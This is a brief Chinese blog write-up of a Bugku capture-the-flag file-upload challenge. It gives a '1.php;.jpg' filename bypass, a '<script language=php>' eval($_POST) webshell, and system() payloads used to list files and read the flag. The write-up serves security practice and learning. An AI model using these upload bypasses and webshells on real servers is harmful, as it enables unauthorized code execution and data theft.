bugku ctf之文件上傳2

打開題目鏈接http://47.93.190.246:49166/

看到file還有題目名就想包含一下,當(dāng)然是嘗試的flag.php,結(jié)果什么都沒有,用php://filter試試發(fā)現(xiàn)作者已經(jīng)過濾了

右鍵源碼看到upload.php

上傳文件名為1.php;.jpg,繞過檢測,包含一下發(fā)現(xiàn)一句話的<?php?>這些字符被過濾,從其他文章處看到構(gòu)造了<script language=php>@eval($_POST['cmd']);</script>菜刀連接被禁止了,又構(gòu)造命令執(zhí)行<acript language=php>system("ls")</script>,文件上傳可以看到flag文件名,再構(gòu)造<script language=php>system("cat flag..........txt")</script>上傳得到flag

最后編輯于
?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請聯(lián)系作者
【社區(qū)內(nèi)容提示】社區(qū)部分內(nèi)容疑似由AI輔助生成,瀏覽時請結(jié)合常識與多方信息審慎甄別。
平臺聲明:文章內(nèi)容(如有圖片或視頻亦包括在內(nèi))由作者上傳并發(fā)布,文章內(nèi)容僅代表作者本人觀點,簡書系信息發(fā)布平臺,僅提供信息存儲服務(wù)。

相關(guān)閱讀更多精彩內(nèi)容

  • (源自摘抄整理)https://www.91ri.org/11494.html Webshell實現(xiàn)與隱藏探究 一...
    JackyTsuuuy閱讀 21,219評論 2 13
  • 一套實用的滲透測試崗位面試題,你會嗎? 1.拿到一個待檢測的站,你覺得應(yīng)該先做什么? 收集信息 whois、網(wǎng)站源...
    g0閱讀 5,160評論 0 9
  • Spring Cloud為開發(fā)人員提供了快速構(gòu)建分布式系統(tǒng)中一些常見模式的工具(例如配置管理,服務(wù)發(fā)現(xiàn),斷路器,智...
    卡卡羅2017閱讀 136,688評論 19 139
  • 因為孩子的原因我辭職了,空閑的時間我就在家看看書,心血來潮也會碼碼字。我會把寫的不錯的文章發(fā)到朋友圈,偶爾也會發(fā)到...
    堅持日更的Olivia閱讀 1,423評論 1 3
  • 今天周三,早晨又對孩子發(fā)火了,原因是由于前兩天時間緊張的原因幫她一起穿衣服了,今早晨把衣服放在眼前又在那坐著...
    趙迅媽媽閱讀 181評論 0 0

友情鏈接更多精彩內(nèi)容